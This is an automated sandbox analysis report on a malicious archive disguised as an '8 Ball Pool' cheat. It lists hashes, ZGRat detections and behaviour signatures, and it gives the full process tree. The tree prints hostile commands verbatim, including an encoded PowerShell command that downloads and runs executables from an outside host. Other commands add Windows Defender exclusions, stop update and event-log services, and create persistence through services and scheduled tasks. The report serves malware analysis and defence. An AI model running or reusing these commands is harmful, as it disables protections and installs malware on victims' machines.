Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
14-05-2024 09:44
Static task
static1
Behavioral task
behavioral1
Sample
8bp line cheto.rar
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
8bp line cheto.rar
Resource
win10v2004-20240508-en
General
-
Target
8bp line cheto.rar
-
Size
2.4MB
-
MD5
b56819fd25d445b1496395660c706dc0
-
SHA1
787c59e095cb10589a8f6480a1f8ffee30c5cb8f
-
SHA256
da628a12427eaf7ade463bf0fa497a3153deed4aded462f3a58e93ba2288f35c
-
SHA512
c9b6f26fa00c314660341e43a1df32d2a67faff6fc3e00976a5231cb82afded4a88b4ee9dab9771ee3bbab27beb0b545caf2f2c2462ca928047b55a9c2df371a
-
SSDEEP
49152:xUSIhr4gqAqn0Jj3GOdcdp7XTFbE3Y8QaToR/22rzlS4HLlH0JMYtm6b8l:xRIF4Sqn0blyjjF4PQ/2GzlfqJD78l
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\8Serverdhcp.exe family_zgrat_v1 \BridgeChainserverwinDriver\8Serverdhcp.exe family_zgrat_v1 behavioral1/memory/1404-162-0x00000000008B0000-0x0000000000AB4000-memory.dmp family_zgrat_v1 behavioral1/memory/2220-221-0x0000000000C80000-0x0000000000E84000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1908 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3060 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1460 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 892 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1644 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2608 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2692 2160 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 2160 schtasks.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 5 2728 powershell.exe 7 2728 powershell.exe 9 2728 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2664 powershell.exe 112 powershell.exe 1744 powershell.exe 2892 powershell.exe 1540 powershell.exe 1372 powershell.exe 2800 powershell.exe 2728 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
8bp_cheto.exe8_Ball_Pool_Cheto.exe8Serverdhcp.execonhost8.exe.conhost8.exe8Serverdhcp.exeservices.exeVC_redist.x64.exepid process 2452 8bp_cheto.exe 1632 8_Ball_Pool_Cheto.exe 1008 8Serverdhcp.exe 3016 conhost8.exe 676 .conhost8.exe 1404 8Serverdhcp.exe 2220 services.exe 480 2592 VC_redist.x64.exe -
Loads dropped DLL 8 IoCs
Processes:
powershell.execonhost8.execmd.exepid process 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 3016 conhost8.exe 3016 conhost8.exe 1440 cmd.exe 1440 cmd.exe 480 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 4 IoCs
Processes:
powershell.exe.conhost8.exepowershell.exeVC_redist.x64.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe .conhost8.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe VC_redist.x64.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
8bp_cheto.exepid process 2452 8bp_cheto.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
VC_redist.x64.exedescription pid process target process PID 2592 set thread context of 2492 2592 VC_redist.x64.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
8Serverdhcp.exewusa.exewusa.exedescription ioc process File created C:\Windows\schemas\WCN\101b941d020240 8Serverdhcp.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\schemas\WCN\lsm.exe 8Serverdhcp.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1896 sc.exe 1944 sc.exe 2072 sc.exe 1488 sc.exe 1524 sc.exe 2092 sc.exe 2460 sc.exe 1512 sc.exe 1568 sc.exe 1576 sc.exe 2564 sc.exe 2320 sc.exe 1728 sc.exe 1748 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1460 schtasks.exe 1644 schtasks.exe 2608 schtasks.exe 2244 schtasks.exe 1680 schtasks.exe 1452 schtasks.exe 3052 schtasks.exe 1908 schtasks.exe 3060 schtasks.exe 892 schtasks.exe 1564 schtasks.exe 2752 schtasks.exe 2224 schtasks.exe 2992 schtasks.exe 2692 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 702a0f78e3a5da01 powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
7zFM.exepowershell.exe8_Ball_Pool_Cheto.exe8Serverdhcp.exepid process 2672 7zFM.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 1632 8_Ball_Pool_Cheto.exe 2672 7zFM.exe 2672 7zFM.exe 2672 7zFM.exe 2672 7zFM.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe 1404 8Serverdhcp.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 2672 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
7zFM.exepowershell.exe8Serverdhcp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeservices.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeRestorePrivilege 2672 7zFM.exe Token: 35 2672 7zFM.exe Token: SeSecurityPrivilege 2672 7zFM.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 1404 8Serverdhcp.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2220 services.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeShutdownPrivilege 2920 powercfg.exe Token: SeShutdownPrivilege 2924 powercfg.exe Token: SeShutdownPrivilege 1500 powercfg.exe Token: SeShutdownPrivilege 2764 powercfg.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeShutdownPrivilege 1636 powercfg.exe Token: SeShutdownPrivilege 1952 powercfg.exe Token: SeShutdownPrivilege 848 powercfg.exe Token: SeShutdownPrivilege 2544 powercfg.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid process 2672 7zFM.exe 2672 7zFM.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
8bp_cheto.exepid process 2452 8bp_cheto.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe7zFM.exe8bp_cheto.exepowershell.exe8Serverdhcp.execonhost8.exeWScript.execmd.exe8Serverdhcp.execmd.exedescription pid process target process PID 1640 wrote to memory of 2672 1640 cmd.exe 7zFM.exe PID 1640 wrote to memory of 2672 1640 cmd.exe 7zFM.exe PID 1640 wrote to memory of 2672 1640 cmd.exe 7zFM.exe PID 2672 wrote to memory of 2452 2672 7zFM.exe 8bp_cheto.exe PID 2672 wrote to memory of 2452 2672 7zFM.exe 8bp_cheto.exe PID 2672 wrote to memory of 2452 2672 7zFM.exe 8bp_cheto.exe PID 2672 wrote to memory of 2452 2672 7zFM.exe 8bp_cheto.exe PID 2452 wrote to memory of 2728 2452 8bp_cheto.exe powershell.exe PID 2452 wrote to memory of 2728 2452 8bp_cheto.exe powershell.exe PID 2452 wrote to memory of 2728 2452 8bp_cheto.exe powershell.exe PID 2452 wrote to memory of 2728 2452 8bp_cheto.exe powershell.exe PID 2728 wrote to memory of 1632 2728 powershell.exe 8_Ball_Pool_Cheto.exe PID 2728 wrote to memory of 1632 2728 powershell.exe 8_Ball_Pool_Cheto.exe PID 2728 wrote to memory of 1632 2728 powershell.exe 8_Ball_Pool_Cheto.exe PID 2728 wrote to memory of 1632 2728 powershell.exe 8_Ball_Pool_Cheto.exe PID 2728 wrote to memory of 1008 2728 powershell.exe 8Serverdhcp.exe PID 2728 wrote to memory of 1008 2728 powershell.exe 8Serverdhcp.exe PID 2728 wrote to memory of 1008 2728 powershell.exe 8Serverdhcp.exe PID 2728 wrote to memory of 1008 2728 powershell.exe 8Serverdhcp.exe PID 2728 wrote to memory of 3016 2728 powershell.exe conhost8.exe PID 2728 wrote to memory of 3016 2728 powershell.exe conhost8.exe PID 2728 wrote to memory of 3016 2728 powershell.exe conhost8.exe PID 2728 wrote to memory of 3016 2728 powershell.exe conhost8.exe PID 1008 wrote to memory of 1984 1008 8Serverdhcp.exe WScript.exe PID 1008 wrote to memory of 1984 1008 8Serverdhcp.exe WScript.exe PID 1008 wrote to memory of 1984 1008 8Serverdhcp.exe WScript.exe PID 1008 wrote to memory of 1984 1008 8Serverdhcp.exe WScript.exe PID 3016 wrote to memory of 676 3016 conhost8.exe .conhost8.exe PID 3016 wrote to memory of 676 3016 conhost8.exe .conhost8.exe PID 3016 wrote to memory of 676 3016 conhost8.exe .conhost8.exe PID 3016 wrote to memory of 676 3016 conhost8.exe .conhost8.exe PID 1984 wrote to memory of 1440 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1440 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1440 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1440 1984 WScript.exe cmd.exe PID 1440 wrote to memory of 1404 1440 cmd.exe 8Serverdhcp.exe PID 1440 wrote to memory of 1404 1440 cmd.exe 8Serverdhcp.exe PID 1440 wrote to memory of 1404 1440 cmd.exe 8Serverdhcp.exe PID 1440 wrote to memory of 1404 1440 cmd.exe 8Serverdhcp.exe PID 1404 wrote to memory of 112 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 112 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 112 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1744 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1744 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1744 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 2892 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 2892 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 2892 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1540 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1540 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1540 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1372 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1372 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 1372 1404 8Serverdhcp.exe powershell.exe PID 1404 wrote to memory of 2392 1404 8Serverdhcp.exe cmd.exe PID 1404 wrote to memory of 2392 1404 8Serverdhcp.exe cmd.exe PID 1404 wrote to memory of 2392 1404 8Serverdhcp.exe cmd.exe PID 2392 wrote to memory of 1896 2392 cmd.exe chcp.com PID 2392 wrote to memory of 1896 2392 cmd.exe chcp.com PID 2392 wrote to memory of 1896 2392 cmd.exe chcp.com PID 2392 wrote to memory of 2352 2392 cmd.exe PING.EXE PID 2392 wrote to memory of 2352 2392 cmd.exe PING.EXE PID 2392 wrote to memory of 2352 2392 cmd.exe PING.EXE PID 2392 wrote to memory of 2220 2392 cmd.exe services.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe"C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAagB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABqAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbAByAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABnAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACwAIAA8ACMAZwB1AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGoAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AHIAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACkAKQA8ACMAYwBtAGMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AOABTAGUAcgB2AGUAcgBkAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAHcAdQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBtAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABxAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOABTAGUAcgB2AGUAcgBkAGgAYwBwAC4AZQB4AGUAJwApACkAPAAjAHMAcQBpACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBtAC8AYwBvAG4AaABvAHMAdAA4AC4AZQB4AGUAJwAsACAAPAAjAG0AeABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBmAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBuAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdAA4AC4AZQB4AGUAJwApACkAPAAjAHQAdQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAYwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGYAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AF8AQgBhAGwAbABfAFAAbwBvAGwAXwBDAGgAZQB0AG8ALgBlAHgAZQAnACkAPAAjAGcAYQB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAaABnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGQAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA4AFMAZQByAHYAZQByAGQAaABjAHAALgBlAHgAZQAnACkAPAAjAHoAcwBlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAagBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAGUAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0ADgALgBlAHgAZQAnACkAPAAjAHMAZABiACMAPgA="4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe"C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe"C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\s6qD0S6dHcOUHMjR5EUKU.vbe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\BridgeChainserverwinDriver\csem9dbN8vZV.bat" "7⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\BridgeChainserverwinDriver\8Serverdhcp.exe"C:\BridgeChainserverwinDriver/8Serverdhcp.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\services.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\schemas\WCN\lsm.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\winlogon.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DU95VhgWai.bat"9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 6500110⤵
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- Runs ping.exe
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\conhost8.exe"C:\Users\Admin\AppData\Roaming\conhost8.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\.conhost8.exe"C:\Users\Admin\AppData\Roaming\.conhost8.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵
- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "driverupdate"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "driverupdate"7⤵
- Launches sc.exe
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
